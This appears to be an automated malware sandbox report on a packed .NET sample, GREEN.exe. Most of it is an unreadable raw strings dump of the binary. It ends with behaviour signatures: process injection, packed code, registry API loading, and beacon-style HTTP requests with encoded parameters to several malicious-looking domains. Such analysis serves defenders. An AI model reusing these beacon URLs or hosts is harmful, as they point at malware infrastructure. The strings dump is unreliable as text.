lH4[+9
}Xzjj
Gy*
\q`&
zmP`T
eprX
ijj}>@
4l0w
T5+W
^;s-
`kjj
;uY
[mOV
(mnjj
y+"+X\
8 ibz
t9h<
4ojj
Kijj
&sQyR
}>kjj
hy4c
.n}1
Onjj
f:vF
}Azjj
\o?W
@.reloc
x+H*
7bjj
}$ojj
hjA8K
a5HborC
YIf?
%kjj
kpLhD
bR6$
Bv~i
[8
(<C^
y&yj
Byte
u, H$*
%cjj
qbjj
H;;~
}mWjj
dVhX
2[rt
D&Ee
W)"mV
OxhrjNcPMo2lUnRkRzHG
ykjj
DtASpe3VOrqmGkZCtfQ9c7HX
*c$
CAiMngHgPH4t1EtAQBxk
}X`jj
}Fkjj
j3eo
am>>
:{/@
qmjj}
x U#1
>1]I
*r:$
Tlw+C
}B;jj
CZ j
)wj@;
aojj
aljj}
bjj)
)Lf!t
D$]a
dqRm3BwCvZh3wD4bKvOAkO2RBspDwI
yyx=
a5E!E9E
=ijj}
3HhCw4YpqVTv7f8Skacjx8Mm7
%^z
14;N
1 zv
MessageBox
`V'-
} Ejj
'I_i
}`jj
ndAuI
Z#DaH
+/ad1
SDkYQNJGTxbbziVxdkyO6pPBtYgYu8Bh
"fa#
Mhjj}
Pa[;
}J(jj
;l/q
FeP
hEC
+njj
$hjj
aY Q
f^]f`
pRs6i9vQnicAH5Lm6crONNpzu
p`9kWU
lHqo5b
Fxd7
bjj}
CF;Q
[oS
z!4w
bjjT
*6^h
W{JV
v>.+
cW<Y-a$
6ex
dzpY
BIv;u
}S9jj
RuntimeCompatibilityAttribute
&6
y{ gI
7njj}
H*ic
Aljj
WDO?
h|qS
.V+[
8RH
Assembly
}v/jj
KK|
(x "#
n#S
hy0*0
[H /
:nR|u
5mjj}CJ
ive2
]n0[(
lnd2OK
ss\A1
aJiG6YQli1qRFLhOYlEQb77ixUrXpVQX
8Y0#6Uv
>%Tx
#nfEKea1r22nHqDi2Fuu6mM9WET1NcDxTXoj
ynjj}
&d.[@
Wp)g
$4a
Yu$=
mkjj
Aljj}
VAK$
x$r;
znBM
Q*tu
!dimg60z1lH9tz61Gb0axg8qZzprfHWW1j
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
%XCo7EeMsc2ucoE5GIJ9YJk7nlLBWUGXfxaHdx
%QF0iUJomrim0T617DIJSjF5PK8y4gUXhG8m2y
zZdf3fFgbppKpPoLoAYBXT8nFuznIhTm
ahjj
!\yY
eWTAI
l\G}
Akjj
}Cbjj
F-6XdK
yToLmJv6NFz0aU8VLQUhWCF7
2FPy
mzrA\
htmh
}4Fjj
V(9*
@||`
RB/b
-<b}
>sGeT
tAVlh-
n r4
}rWjj
Hg"#3
DID%DNd
{yR3W>b
"C2I
lHKju1jbs3cZXFPm1S9MpPOLE1C
S)Ez
dngD
mhjj}
qkjj
|5z:Q
rDTL
T/dz3
get_Item
c.M{
3T<: eO
5qs,S
UMZv
m}O!
tij\
H8NU"r
)*oZ
29:#
o{,6
9TXlPHuE6rYoqE0tK6mqjVXhI8Ase7B
t)H[
QQ](
}*hjj
9;EVu
p6fW
}Nhjj}
p"tU
njj
GC0By8NpCPuKW0qcgGUIySL
LnO+
=87
`,ft9a4
xPBv
eojj
`R:@
"HMms6NHmobvRZyQByV6vNF2ujKeiFwfYlu
abjj
8-e#
8jf37TX3WFdwU3tft2cChMzMiKCc
6}iE
PA7v
iO3)Y&
6g`UntfkM
ResourceManager
Show
liwpT
}=?jj
gYu=z
PropertyInfo
E]_G
~MXg
V|W/S8l!Nh.b
vZq1
Z QW@9
eiUQ
xqAFD6GVda69KtvGzjfKXuY6h
pEdVHAd9N87D7gUmFXaP
Injj}-
b419R
k_hJ
c;\a
2@9i
AagqHdR89C5CNc6m7kReUp
I4wT
k96}
65$]uO
(Ukjj
er[F
ijj}Qt
c~@ao[
_ =\
Th5j
V|CvjjV}
}}hjj
System.Resources
}.W*
sN75s
?_D(
07sh
E;?L.
GetObject
Mkjj
XgjFkzCHMLBCrH1WjrF9SHhI
M_2 v6
wnjj
mC}` |
}0ojj
&be27
.'`HJDK&
}Fjj
WCTAkm
%!}d
Injj}A
O*cD
EGyjz
l{@o!
c hg)
m!;o
AssemblyCopyrightAttribute
5r%n*
&pXgQN1ekJViQoSlw1s8peN9arYbjLMt7GerhQ9
ijjjj
!(!kjj
"6YTaROmZYWiHARKOPV1RhpsjFoqSKGnYMC
YMs+R
@gz<
bkKbk
6z6.&
hhjj
)hjj}n
P17>
kmZy
dsCL4QEnNtF2xd3ZsL39FV
VD~*
Thread
aU,OE
'x(Y
'9b2ZzoT44Brjc1o7uv9iZM1wpuhxwfFlIKz8civ
HPd@+
""h\
SwoWgJdHJVOkcvliMcdljentMTAc8
K)lo
Whb
$bg|
q]@yl
#hFVzJxdxMGYJMhdmbWZD90840I5AEVWdUD5
snjj
1U>F
vMqyjOYPDVbkGxSHrcngLn9XiPxR4
cWcyzMB6Y7JhKYALXuKSO67U2U
2t2RzFK
T:+@K
3wwc
(`0>
g7pX8J<
}j9jj
>/'P
F,cQ
45}a
{&U
=Q=M
^>;(
mR r
(enjj
zkjj~
VEPr
!ljj
6Jj
1hjj
bt@&
d!2[N
+14.
]RWB
xo1iHLrI90rMcPawaLiVuoq4C80h
8]#
b3EhTgKdfEVxn1P4AFIkmgi3
MethodInfo
FBxK
w5Q|
Exception
/~.<
y9Z^
bV{^
!i3q7BYxj2zC8dX7LPJzccp8W9dmASeHPw
$RJOk9di6jbDb3LgdUPNVPRaoyxiJueQvISpr
'{/%
RwD`
snHof1D12TzRT2sS5dWN9ahWJ
&lcT
}L8jj
Gmz7wrp
sijj
}Ijj
t@7aA
97rzdg4ErFRmpxAPRZoAkd9GTBEXNL
N+VUt
g$|y
'^bkR
LvQ#
61vNW/
}K?jj
+K8
Z=2Y
}HCjj
)njj
}opjj
YiUl0d
8(C]
B@W"
!kjj
}?Qjj
O=R]
cbjj
*p47 !T
}^njj
;0]
}`_jj
'ijj
%njj
0352IoV5nj77nIscT57qKcK36SM
=1ze
4Ju;
[Bm1nr
8%F8
kD-@
}gwjj
Xkjj
]UidW
'd(@
vr*a
}Eojj
}ohjj
I^Gk
s%Mh1
Z;?
'xqC
hU3V
21J`}Plj
}Kfkj
tmRx
e@hs
PbQK
=>R@
?}}T
X\&4C
Dg#].p
@Yj*n
`pd^R
$J%6
unjj}
s{'8
(E|TY
[;# [
Uijj}o
XnoX
L(]b
}bQjj
^{FQn
xz?M
GetProperties
GcP
#?IC2Tu
$R5I
-FYh
NQ_
"dOx72UoC1hBYd2JyloUJcaJqReQzeQsmhd
'~aa
)g8(
}yhjj
Z.w
ubjj
cVrU
x0fp
9J7
^`Vi
S$]dl
JV~~
|UB.
akjj}
y}dbjj
~@G{K
jkjj
ZD<j;
O EjV
eI1
?(PV
S4/
a/,>
akjjR
YI*AOEP`,
;4qO0
GetMethods
}2ojj
M<x
y)JjR
Mt/9
ZCo]
m|F<nVn
Object
,[z4
VaBM
r6J3
Kd E
fysQ=
op_Equality
PGL/
^C ;!
Q9!t
ixdo7vJ2BclFNapi5SFrgsPCEY2
0 j=4%
w@c($S%
]ijj
Uor$
*Klo
,};ojj
5M9Q
yhjj}
!<kLP
v@fs"
UT.)
PS- U
SyC
D6Mk
}V|jj
-m#^
yhjj}H
Km7k
yhjj}M
u(Ar6&
q:5p
k0JzvfFW88REgo07NQAzI8y
injj
yhjj}q
;ub1
mjj}>gjj
ujjj
(*Z^H
4d= /
h:qwg
o.;
*v}k
$Zen_
)^ `S
BSJB
};{jj
!WeRHKA7OUUikEcdLAdbSegePW9d62WFL2
7njj
caGL
zNl1JPs
)jFtI^z
Pfznrx
V=el
bAs7
kSGnEPabwDdQwQNMemdDqGRVqmytg
0Y3V
wC0\
mhjj}IN
sf!k
S".
(zrf
3i5V
"3GC0dCf6TlvugILOr7c7ueK28sakbS0xti
j9GYM
ulp3
"Ii">
}ykjj
}c`jj
S$U.
&mEnlG
|/,io7T(
qhjj}}
K\Gc4
e_K<
get_Message
!This program cannot be run in DOS mode. $
G(5,
8%%G5
'#d+9
B!Z1
'rY]e
&S!hC
<@?o
i<j
dMnp
LH,^
qa@b
~iC
lhf
p|%
Bmjj
<=D
qerwVW(
[t}
({UmV
QAiE
:|_N -16
LX9
TI~{\fY
E ~g
sm}c
7fjj
Qkjj
:OJk%lRpQ
~:d;
ol!M1
.DY
C@'
/AgS
UkjjT]
w eM
njj}
4q0/<
>Qx]
cqM:
JB5u6DwFazHKvNMKV9HNH
^]uR
] _s
nZf|
}'njj
r].*
hId8ciw6TsYN8u8lupqrrXDl
/9+wt
T%.b
C=N 2
<PD7
d3odStcvCnfnnJP0Po2Oa8Ckw
t") aj
}\ojj
JlZp
,jo>
[NoD
lVNt
}xmjj~
5Rv4aA
f:g$
Q1+f
3g24
2kjj}1
}6<jj
]n`J
M6zl
CvZD
|"HeB
)&S\11mN
)1Ck
,ehGK
]dZ8
{JK
4S#k
2revZLyQJdnLHMFAxBMKT3nz
h c\
>p)vu
xhjj
}Rojj
P#g80
1PFgIHxw3JjokkelcEGUTjDY5CsWy
BDWj
V~":M
h"S *
}knjj
*l+w
8qOn
K.Y\;*|
}zjj
n*0E
p#RQ
<T1
0EmyM<F~
ThRL
}Vojj
!dh5
_Lf|
+;$[D
(P2U
h(@j~
}Q]jj
C:SR*w
Vp[}
mfTL(
i]h?
-kjj
~_YYYYYYYYYYYY
I8H
(kM4Q
?KON0
(Qkjj
1&?elPJ
u&#d
~KYYYYYYYYYYY
?,8Y
.n6Z'
M{y=
%5 }
18)=
R0^55
JW958
'cb2FnBQq6rZkaKBF5m4ye7y01MuVdBI1aLryRlQ
OcCVo1opMV0zJ5NQmZm6mKEcLpRKD
KVw#
.8$G
P?L>
4"@6
cE(]
i#B?
dDEA
efBl
3sJMcFA
9B]wF4Q6
} Qjj
a' hk
TN\2
ijjjj}f
&xUo6bvqvnquckJAZ57pSGdq4fKbqHt2mnZwJAG
}~cjj
lyGl
}9bjj
z !zE
=ijj
Hhjj
}}ijj
lm^6M
dS7wx
NMn
}_Vjj
tK;o/IM
!ld
v't#
,ojj
SwK:
!}e&
CwRMIDRTo2zRZiCTIlYqEM
;4W}
anjj}lO
G`AQ
}v jj
9bjj
Ikjj
FB3
_^bAF
P"w0
e}ep
U4"_
^@gCs
4E;
_vtxe|(
3x=
t,r
mjjQ
}fjjT
z5`$
$C^
(M<UI
(i6=He
zjx'
^N=R
N\>R
~cjj
BW8WThH
4V {
&blVa4a5jygE30KWXyuQKB4vbKU9bEvBEa1yN6t
"o=(
Y{Ea`H
gN3PI]JZH
^)u$
.ijj
0W7ZeNQPhApZ6F3SEzgd
"h4eeZFbs0pxI3AZ7Vmy7B0dAJVR4RgtGY8
CompilationRelaxationsAttribute
~[+*!
}ttjj
nK.k{
CaG!Ux
SnT,
B;ZE
Y*JZ.
4!@-
/-nc
C[3^
,HG@u
c] sl
&SXXyIkY3itrAXheVEWUC3UmGRl2818esa60CAo
j&,Ah
@p&J
M P.)
HiD7a6C
Ykjj
4 F=
ryCW
C=zL
FrbWu*o
~HKR
kjj
}hjj
M2s.
95%v
|[t}
}rdjj
}F{jj
}hojj
apDl
>w p
XbQ*
KxHk
ebjjE
k4v3Gx7Uet8n9NZNmayrBITmahQ
_A<z/hl[
o=}
1:Z
Ux,@
UJi\%*
R9 a/H
"_v(
}Uokj
#wovxlQnndvAMIqSeOt0hnBm8cIlNrYWpTno
z.&r
#JJfHl4wqrzQEB3kojHoZ3VOQLcvQkqofEWs
MAb<
aW{8
sHT
26`$eT>
}Pijj
oe8aMOI1t4BRAiTEKWnWMKi
MT\V
l}oV
)c^c
6P7
.2g
}}M
H~d}K]
}^_jj
.HZ
D -X
e3r;
y,W
.<^a
1'vy
}Uzjj
%~]fN@
S\3
Yu=zT
Y2h17OXBThW8ZmsHT4FKmiiXwEoPEyz
/}dx
:w '
r)2B
}6hjj
aijj
}}[~
[P V
5oTq
}`Kjj
cT&V
VA-/kl
r@2]-
}O4kj
Ud$
Z9Lg
1Q(j
"mjj
"0l M
$gqQ
HWu,
l4Y>
J8f`j
?NZ%
lA`
m?mLW,B
ZJ<D`~
?`xd
ci\e
}zhjj
j"Q!
H}k"Nt
cE#4-iQ
}$<jj
tT: U
O 8O
R>#(e
ljj
P~
[%Y
e,UB0
nP2EZcW4YUAhjQ4kt5Rfodn
__ 4SPa
Jd7.
cxHl0
Gkd=k
3o0HZ
mjj%I
+LI"
fZ%1X
RQg!r
G)K
]2uEP
}Hfjj
}hnjj
[b O
0h(l9
Ukjj 5
SlqpzcjZj8sqMJHubQeJS3SINPBi
}.{jj
2BT9
Mv@Y
}'hjj
Upa+
njj}
OHmz9z2Hi6Tf2mRvX8jyoINgAFAxZMs0
SKqc
MPA{
9ALE
XyV4,
JJAh
(-kjjT^
&"Uu
djj}Z
%.St!
'CMVqD1UqbXJ2PRhKa7JoOVBLVW0TnGFK4eRKUet
#ckIK5dkXfGbptuHOvCR5zVK0KWbGaFmlrx8
}0ijj
+]U?
}cjj
U2y&&q
E\v
W6PZlengEycf6ETXb5yJ0ky06
=T@v
ibjj
}^pjj
6p^Xj
l_SR
$$FO
J/?
iBQ
A+X7v}
}wzjj
<~.y%
RAK+
(=jL
[ %
/B&@t5:
{5o]
)1-n
IP!<
:14t$a
}Xijj
}N;kj
}``jj
ZrP*?'"
4OcLo1xHyuGTwpraeW4MMFLTFJ4zT
}Hhjj
9TT2k1ZTkjmZldtQBVBandQ
cou$
!04Kv13D0Ke5w5ZntXgwDTHNK21rtyGDGK
&L<L
K81TR`
w~9z'9
.MmS
` v>b
+z1*
:m 7c
F\G}
_Bvz
lR>p
5HR@
J8D[l
>x8}
VYYYYYYYYYYYYYYY
GIhZY)=
8ES\j
};S_J{
p54G
}EEjj
WlyZ
-2h8
RLTu
&FfdsERNzsEnOI04Als23iB66OALr7f9vLcTeR7
wz+G
cEzwu
J47w
d<3d
_CorExeMain
}>bjj
rA
uAeQq
^'?o
i"d|
]| Q
J0;fc7
hjj}G8
hjj}y
o p";V
<~rG9
C$||cQ
l3R[
982zKV
Oai2kuGhJwDXmQ9z0UXS
pzS8
d4a8EGc35NCn0Ik1sj9Um7GtQ
I,<#
~61
lkjj*
"nVj9RbJfyE0ebbsB6Aggin6ltDMXD1HnM1
e`T|jr
F MHm
}0njj
%XiVgAghCBMllYwA3Sr7FYR1hsvQntXGHtu7qk
Yu=z
WA}k s
O Oz
kjj}p
L'3#
Cpq@c
1*h&G
}g-jj
nVB
|]w|
6^\a
}7Pjj
0JiX
nR^n
KOCvk
%xceL
Af,?
}Xljj
bTxL
KV1
,M%
!\`yS
V $C
S*7RwW
J]_q
R8I
h;k1
4Wdn2
NB$
ghjj
"2wLKTZMm8X5Vgx19SBKjQOvfaUvadZU8G4
"]{~
qqn:
a9W?
#TQXwUzPzt7LiPGfmFIv0BhuYhiLuJsQ6Vy9
gjjT
YcTv
`PE"+
wioxF]
&`VY
`^^h
!w\`
0I\
3(mq
8~t
FjIr
}&3R
vidD4.
m}gG
SkipVerification
$wSJ0wEzLUcvZJOkliZfLJ89JyoJ7VG45kioq
PV)N
-ggt
K/;P
ZE+0
SLBqfG7KEKHtBLCBTbbPf
=JQ)e
<di9
HBs
(>1-
@\U1
>Ly_
]/
QS)|
c@65
4 E{DK
;J|F
JX'\
}efjj
7$kG
w$+i
6`jj
V`>a
}+mkj
sljj
kjj}
W&C.
WVGD
kjj~
! (
U><F
3H8
Zhg2
fJzlxj
Nc
P}^~
}<fjj
}_-B &
aKb(;*G(c
[| j
kaofXti7yGH6oEXStoB47ztYvAu
'v9Wo91GlOd1id3av6prS9U3Co61WWgOQjxXUCAK
%wsPRhdF1PYYatStgjmTslzMqCYsmag5Rkncyd
W0P
uWq'w
`kWA
kU2G
?WMZ
Nsd?
Ga Cb
O/R5!
/W1z
,Y9tx
qpl
etGV
U\1_
xiV
}P\jj
mjj$r
(mhjj
beQi
M#-3-\A
~Dm(
B&_H
!GCz
2Fiz
$Nzen0NpIwucesnywuC0qZttPOCjUDl5ujReX
i@
PFt/D
<wIM
caz.
T{]fq
%Q(}
M&Rd
\f-
>G* ,8w$
o9:n
M/c)
bpd(
hpn9
ax(
&!6M
chE1
s zV"
%iCR
!=B,ClJ
wVj2
Mbjj}
:w+wy
IF5LsgCLvP4cYva7WAtQ2
XQ*EK
>S3{
-kjjTZ
wc<46B
pYzna
}c jj
xds
pI.+I=h?
9kjj
Gp_B
ax<~wCK5
f Ad)`(O
[_m
#`{x
p T`D
nK;2
Z t`a
}}Kojj
w,'Xz
n+sP
b|To
_M*-
QpFC
Y1y&
lhwp
wkjj
@HUP
^F l
dTTO
xD_qd
~v>n`
>k.^t
b_qJC
t+MQ
}5hjj
L&"p
Hf1hM
AY4=
ae$Zw
@BW)
,38m3
/RZ\=
wc?(
jjj}:$
+#qNa:
}h&jj
7Uc]
"0bvkntAldoICHhQU1pqwz7NnutgW2cF8XG
#3Cjlkz6U1rCf9JFYBbYw1EInzTKuD6aftdC
Z>h*
Pcp>rB
&= )
7`]|
u{_N
\?1
$68lG4
GREEN
z<>
5fjj}(
}:Pjj
ub;#
~<YYYYYY
* >Tg
N/W
Mq/Z
0;8
_?C"=
ohjj
5fjj
FVPDSt6745IgDYwBgUaId
nD1edIadxeh23SK5YxP4IW
GsT~T
*4j:8f
yb
cljj
F"PEA
w#mB
3A)-
=UA}
System.Threading
yWS`0X
QqJ|
,hjj
5$C;
}iojj
^_0
H4Q$ m
System.Reflection
`"it
!sM";
~$s|
Eub{GL
}Pmjj
W!o
17`w
-"3o"
3Emx
)~Vo
b>iu.#
DxWl
"xsgMdlm6FuwyDaSfN0Nni73rJ8OcNHBvGH
n" ]d/
;,%u
%*ZR
ykCb
4rs
,W1)
UgS0P
}1ojj
L~>j
4Dfa^$
}$\jj
Wox76jfVW3JLzrQ3ai0r
UV<V
++Yg
enjj}
)`R2f
:8 w
G<d@mA+5
8s}.04
H)} E3l>
(tLg
Tuz{
.~48?&
Da#v
DKO5/>
J5w!: $`x[
P3Ho
>%,( "
er#\3
}u{jj
{6N
Wcp`v
"-hz
2in7
W-cD
jjjT
`eQ]
jjjR
NO}l
> s.
-q\^
^/!_
jjj`
VmqW
ge8zajld8Y2JwRzhmBoLJicfXZXSt4
}y~kj
o9m/
jjjj
cO0l
9F
3ljj
m/T4
+`!7
I=$9B
U;`\w
jjj}
` =O
^0^$+=a
7Q+fw
Yo/
YRQB
zt@
]3zA[
^LV H:Z
jg3
]+BE
nP-
jjj/
jjj-
29.25.54.15
%OQ
Z-p>
NR eG}
`F{K
4lN45
)?Z}
05lq
PGzg
ii!*
CfpJ"|
Mbjj
5Jm
32B
rGxF;
ehjj
Kp <
get_Count
e.5XLd
G&X]
?$aU
lO],
|>kjj
}lkjj
}kijjT
i'Q
lgLE
3><0
46r7fqGmRXPucpqxw3EHn08n
Injj,
cW2+
y#/yk
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PA
P):W
cZT!
8WW~
|nz]
%g4{
7%vn
=hjj
ukjj
gQ"#
*)t(myO
qs7P
};8jj
W"oBy
ljj}
^Ag0]k
-1.>
G5q
}i`jj
M]ye
7o0h
X^w|
qEpS[R
e4IuJpKQrnOVspQ8etgsqwDYi88I
0$A9
)kjj
ljjT
""W`
GetTypeFromHandle
]qO%Xf
}yQjj
ojj}
f/'
_jjV}
!Ze~
-8h$
b3o!
ihjj
Di2bejupNYpbG4uUDLqgk9GpQzUhU
`%rn
1mjj
+QVq
h4^K
0A4k
3;Sq-V
Z%Hu
|mN
xMix
VTdBz
[U~c
s';s
I3'R]
%- 2
t7'N
[_z+
!kjjT]
S0BJ8
LSd/D9
%Rea5RSVWucCC9FhXaVXgycpDXT0TQsxsaOTRg
fKj
=HIP
()kjj
"9yQJJpcQhy1LjkgTuSwX4qoag9bGXeGOBh
c6`^
&mTR
"8G743AWrF5kO1zTdH2La2sn0aFRL67X1Dt
}[njj
Z8&Q
2hjj
`jj}
":Y
eHsq
}#Ejj
Y7{;
[ $z
BB1s1goB1O8siv5DwCILCC
f&YY
Injj
fRFb
`jjc
>0YD
x;_6
<|k_
}nzjj
ynjj
uoH]
v;goGG
unjj
sQ(P
Dez=#
[{M
X9~c
~jjDz
ijj-
hM Zn
|Jkjj
J>;0
jIrf
}Tkjj
Az<,
(n!,{t
|!.X
cW{7
S8CWF7IbXZxTFQQqjBkzE
%F~r
TqptlW4BWSvF7A5O12zdMYXSuKh1MGzi
nH23
System.Runtime.CompilerServices
|W{!
otbK
E@k
}rcjj
w0|-
}1hjj
O{33
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
8%]TW(bf
ijj}
3QI=X
K8zm
dmjj
dy4e
}Vxkj
T$D
HEN3nqlN9KspQZgQ43rVYveSQAADF
!L]s
} Mjj
}Tbjj
ta8D
CVOx9GqYoKQQf8zgcRJnGMScj
wRR<
^lO\
wwr(
Rc7X'
trT7
5<II
qnjj}7
W4Ng
ij!I
/D u
RBcfu
kB8N}w
}^Qjj
~9ob
m:TV`
t|0/
}3%jj
E~(P
<Op
(F )
n tRA
5,#+m
a}@%jj
Mijj
dkjj
)=KMkZ
O$&J
I
|Oj,r
I|ZL
=FG2&
PcV27
$,~@
k{+I.1*#
v>&BX
AssemblyProductAttribute
0kjj
}. jj
} Qjj
B"">
V!}}U h
pmif
w:U`
=n%ZK
a*MG
<{se[w
o(O
}Wijjc
y}!njj
}]hjj
]{,"
5jxT
Q?6]d
-EC
okjj
[njj
Thjj
|r'0z
_ajj
?;%r~
Tnjj
}wRjj
Q(wK
O(4J
!hjj}tBjj
-ZNF
\|TC0e
M-DG
Nqw|~
]q/)l
~~D8
o5Y
YmOh
,3l{
%R
A{;"gC
m$9s
)A8ZLjb*k
Qx-/J
m#F3
#wrxzwOsyWmIbIEtr18QG1732qS5O2EeeiCJ
[ [
qnjj
jjj}B
#GUID
;{+d
M}Jm
9njj
heo|
'n8HFOObpsFgk54PhMID4BLRX91ojwQDCpvWhp7r
/{=K
jjj}+
} ljj
'l4a
>;%|> :
JqpU5YQSZmFDH0Ju0JRv
}"ojj
#0]S
*2z2
}^ojj
5AAz
4ijj
ahjj}a-
W*Jf
kjj}
-]3f
JxsZSReOXPi92GplP5cPKUqgKcN
Ohjj
:V1K
IuQWR
p8Mi`
LaH[
KI!
I/yd
=&CF
T[}I
'KSu89UiintiYJH4Z9mrz9UgdTXB0arxHIyHTD25
:}L3jj
zqQ<
. H\]c0"
}#hjj
! v4!
2/<mmq
~i^1?
ubTZ
<z"Yx
e@3AN?
mscorlib
I5:R
}y\jj
MoQ0ZOwweCuP0QVhGlNQz9KCfK
3))"
,+u;Pl
Y&X`
Fpx6NhHVGtyv784qkBW9STIn6UqI540M
)D-h
)JW
aljj
?]
<frnJ
Vq8jZNcMvfriscNXCiJLUgd
}d@jj
m1h7
gRs9
qgk
z- &8#
NYtRE
|6wT
@^F-
E=A>
SW^x
(.b'
2W8
}Anjj
$ijj
-uE5
(ikjj
&l]]
HHLa
yW*
!cXT
PqxzEi8YzQRqwH7s8qPzgnngjo
ojj}>
v ;w]=75
I$q
\#U$
yhjj}
V?7w
;`&*-D
01)"
}kojj
24`6
}A(jj
AdBT[SP_
qlKTcdEsVwUVw9fKMvkD6BOuTEz8Q
^E&kC
{hjj}~
bbaCB
.iM&
4Oj]y
Fgnt
wWQo
j6K06c7PqzcwqHkeVTOvSnv8
Z*4e
iA>Y
|mtI
}7gjj
}@ojj
F.@Pka_
7P6VPb6suCfMCpuIeBtfNJyqMms3TlC
hL'=
I"m?N
(V$
7|X6y
}hjj}
(9kjj
?]z9kw
mscoree.dll
}MVjj
}${jj
yQ8*
zW@j
lz<"%
HDb1I
"fjhU0eVujbxOjOjA0lwmnvmWHjM0zE6gsS
$cjj
bx/fR
tcFK
2 i*Q
0zEpr0NXNbLSXclwzEEYasz9R90
]r((
Injj ?
}zkjj
<HR1
OMmj
xet03mr9nQUCuraA8smCxy
-;>
s<y
zojj
V}#^S
"bCt
l5~`
,Xmr $
g^QQ
I=;u
%d!$z/
?ijj
d$ q=
2_h
p~: ;
^A.H
System.Windows.Forms
nwk&
uljj
6&f;
hjj}<
M7zR
anjj
r_2u
2{/w
~svzXG
Aijj
zDfpDko1zirym6mpYTvDAbCjNHLoVX
I{,9
]I$d
g!ie
7Aq:
u az
8RJz`
}aVjj
EBKosbxIM2KXKJFezxuMgmCwoe1
hjj}
7>!iW
)`jj
}Lojj
!(Ukjj
#JTdw55yZAnHxcW3npx97lF8rNJniUgjFb0j
yV:pD
}djj
PM!L
% I#
TV%p0
hjj}l
]}k !
`&] &
}[mjj
qijj
}.gjj
hjj}V
hjj}N
\o@e
'JjluLwsYzhNmiV337OJOPJqTMFPPgzzYiJ1zEvd
Sleep
dcV4?
PQR`
4bK.
}Sejj
`ijj
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04_64 | Seven04_64 | VirtualBox | 2018-09-09 19:32:31 | 2018-09-09 19:35:28 | 177 |
10 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content "db" (Soc-Rule)
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: GREEN.exe(2504) -> GREEN.exe(2460)
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.39, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0004f400, virtual_size: 0x0004f384
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.promcy.com/ga/?ETUTzJu=+Sm2vG0/c8A/pCDamCk/SQbgsVa/WUoYV9BIqR9+i6t3xcR6Ew9ieOy6HjnP1pm58AxStRWG&DxoHW=VDKPcDdPwnEd1V
- url: http://www.no3.world/ga/?ETUTzJu=rXonpmMDn1Ay58F/q8U7Em9uDIcx766tcys3mrcPCll1+ZItMc3Gng2MbOBGaSsslENxZrjS&DxoHW=VDKPcDdPwnEd1V
- url: http://www.no3.world/ga/
- url: http://www.mycherrygum.com/ga/?ETUTzJu=96D4Tkb3WzZ7Mh1tqKKYtqZf0GHD+VbvMLkslyCFKk/Y+vDBUqtqFS0yrhmBLhTmLzbtOzIR&DxoHW=VDKPcDdPwnEd1V
- url: http://www.mycherrygum.com/ga/
- url: http://www.mazda-2.com/ga/?ETUTzJu=enjcgrafWS8oV2xepRj8R+AtfVpCO6WxAm3PGsmAuNISnYf4ikZntusvq9tbZUCz4q/sRwwv&DxoHW=VDKPcDdPwnEd1V
- url: http://www.mazda-2.com/ga/
- url: http://www.modaness.com/ga/?ETUTzJu=WmfJ7BdalHyJ4qs+tgp3ACHleifwv7FnXhNg08PKGoiouH1UjhiO17EHFc5P14hW00qDOV+P&DxoHW=VDKPcDdPwnEd1V
- url: http://www.modaness.com/ga/
- url: http://www.resourceonbench.com/ga/?ETUTzJu=0R3c8C8bGa5AtKYbifh1nbehrtLKQQx7GrR/2s9C+Nqh34VcKzzMvkn0+leQ2vR1YrxENmwj&DxoHW=VDKPcDdPwnEd1V
- url: http://www.resourceonbench.com/ga/
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://www.promcy.com/ga/?ETUTzJu=+Sm2vG0/c8A/pCDamCk/SQbgsVa/WUoYV9BIqR9+i6t3xcR6Ew9ieOy6HjnP1pm58AxStRWG&DxoHW=VDKPcDdPwnEd1V
- suspicious_request: http://www.no3.world/ga/?ETUTzJu=rXonpmMDn1Ay58F/q8U7Em9uDIcx766tcys3mrcPCll1+ZItMc3Gng2MbOBGaSsslENxZrjS&DxoHW=VDKPcDdPwnEd1V
- suspicious_request: http://www.no3.world/ga/
- suspicious_request: http://www.mycherrygum.com/ga/?ETUTzJu=96D4Tkb3WzZ7Mh1tqKKYtqZf0GHD+VbvMLkslyCFKk/Y+vDBUqtqFS0yrhmBLhTmLzbtOzIR&DxoHW=VDKPcDdPwnEd1V
- suspicious_request: http://www.mycherrygum.com/ga/
- suspicious_request: http://www.mazda-2.com/ga/?ETUTzJu=enjcgrafWS8oV2xepRj8R+AtfVpCO6WxAm3PGsmAuNISnYf4ikZntusvq9tbZUCz4q/sRwwv&DxoHW=VDKPcDdPwnEd1V
- suspicious_request: http://www.mazda-2.com/ga/
- suspicious_request: http://www.modaness.com/ga/?ETUTzJu=WmfJ7BdalHyJ4qs+tgp3ACHleifwv7FnXhNg08PKGoiouH1UjhiO17EHFc5P14hW00qDOV+P&DxoHW=VDKPcDdPwnEd1V
- suspicious_request: http://www.modaness.com/ga/
- suspicious_request: http://www.resourceonbench.com/ga/?ETUTzJu=0R3c8C8bGa5AtKYbifh1nbehrtLKQQx7GrR/2s9C+Nqh34VcKzzMvkn0+leQ2vR1YrxENmwj&DxoHW=VDKPcDdPwnEd1V
- suspicious_request: http://www.resourceonbench.com/ga/
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
- DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
- DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
- DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
- DynamicLoader: ADVAPI32.dll/RegEnumValueW
